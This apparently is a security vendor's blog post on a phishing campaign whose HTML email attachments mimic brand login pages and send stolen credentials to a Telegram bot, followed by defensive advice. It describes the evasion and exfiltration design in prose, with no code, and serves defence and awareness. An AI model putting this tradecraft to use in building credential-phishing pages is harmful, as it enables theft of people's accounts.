Phishing has evolved, and attackers no longer rely on suspicious links or poorly designed fake websites. Today, a new campaign is using HTML file attachments in emails to impersonate well-known brands like Microsoft 365, Adobe, WeTransfer, FedEx, and DHL. Their goal? To trick you into revealing your corporate or personal credentials.
This new wave of attacks, targeting organizations in Central and Eastern Europe, is highly sophisticated. According to an analysis by cybersecurity firm Cyble, the attackers understand business processes well and use advanced social engineering tactics to infiltrate sectors like agriculture, automotive, construction, and education.
The Trick: Legit-Looking HTML Attachments
Instead of redirecting users to fraudulent websites, attackers include a malicious HTML file directly within the email. When opened, the file presents a login page that mimics the real branding — logos, colors, layout — of the spoofed company.
This technique gives cybercriminals a key advantage: they don’t need suspicious URLs or external servers that might be flagged by email security filters. All malicious content is embedded within the file itself.
The emails usually have believable subject lines and filenames, such as RFQ_4460-INQUIRY.HTML (RFQ stands for Request for Quotation), which adds legitimacy. For companies that regularly deal with quotes or procurement workflows, these messages appear entirely authentic.
How the Attack Works, Step by Step
- The email arrives with an HTML file attached. The sender pretends to be a client or business partner.
- The user opens the file. A fake login page appears — Microsoft, Adobe, etc.
- The victim enters their credentials.
- The embedded JavaScript code captures the data and instantly sends it to a Telegram bot controlled by the attackers.
Unlike traditional phishing, this technique avoids centralized servers. The stolen data is sent straight to Telegram, making the attack harder to trace for cybersecurity teams.
.webp?width=1140&height=700&name=Campaign%20Overview%20(Source%20-%20Cyble).webp)
Campaign Overview (Source: Cyble)
Technical Details: Designed to Evade Detection
Cyble’s analysis revealed that the attackers use embedded JavaScript within the HTML file to collect usernames, passwords, IP addresses, and browser details.
- In some variants, the code uses AES encryption with CryptoJS to hide the data before transmission.
- Others include anti-forensics measures, blocking functions like F12 (Dev Tools), Ctrl+U (View Source), or right-click.
- The stolen data is sent via HTTPS requests to Telegram's Bot API, using hardcoded tokens and chat IDs within the file.
This level of sophistication shows how criminals now use refined methods to blend into normal network traffic, avoiding alerts from tools like EDR (Endpoint Detection & Response) or DLP (Data Loss Prevention).
Why This Campaign Works So Well
Its success lies in how well attackers understand business environments. These aren’t generic phishing attempts — they are tailored to industries where RFQs, invoices, or pricing requests are common.
Messages use the right tone, impersonate real vendors or partners, and catch employees off guard. Because attackers use HTML attachments instead of links, they bypass standard email security tools. Most filters still don’t analyze these files in-depth, leaving a blind spot in enterprise defenses.
Learn more: Phishing Simulation: How to Successfully Train Your Team
Telegram: The New Cybercrime Ally
Traditionally, stolen credentials were sent to a remote server or stored in hidden repositories. But this campaign reveals a growing trend: using legitimate messaging platforms like Telegram for data exfiltration.
Telegram offers anonymity, encryption, and a decentralized structure ideal for cybercriminal coordination. By using its Bot API, attackers:
- Avoid detection by corporate firewalls
- Eliminate the need for traceable domains
- Accelerate credential theft and evidence destruction
What Companies Can Do to Protect Themselves
At TecnetOne, we recommend a layered strategy that combines education, technology, and real-time monitoring:
- Block HTML Attachments
Set email policies to block or analyze .html and .htm attachments, especially from unknown senders.
- Deploy Content Analysis Tools
Use sandboxing systems to open and inspect email attachments in isolated environments.
- Monitor Traffic to Telegram
Security teams should flag any abnormal traffic to api.telegram.org, as it may signal bot activity.
- Enable Multi-Factor Authentication (MFA)
MFA adds a second layer of protection. Even if credentials are stolen, they won’t be enough.
- Train Your Employees
Human error remains the weakest link. Run phishing simulations and train staff to recognize suspicious attachments.
- Conduct Regular Audits
Check access logs and perform retrospective queries to find compromised credentials.
Similar titles: Do you know how to spot a phishing attack?
What This Means for Corporate Cybersecurity
These campaigns show that traditional security models are no longer enough. Organizations need end-to-end visibility — from web traffic and emails to file attachments and in-browser activity.
The use of HTML files as attack vectors marks a shift in strategy. Rather than hacking systems, attackers exploit trust and routine workflows.
At TecnetOne, we emphasize proactive digital education and strong policies to block these threats before they start. Preventing a single wrong click can be the difference between a secure operation and a massive data breach.
Conclusion
Phishing is no longer limited to badly written emails or shady links. Attackers now impersonate major brands, use advanced tech, and exploit user inattention.
Next time you receive an unexpected attachment, remember: social engineering is cybercrime’s most effective tool. Don’t open what you weren’t expecting. Always verify the source, and most importantly — keep your defenses updated.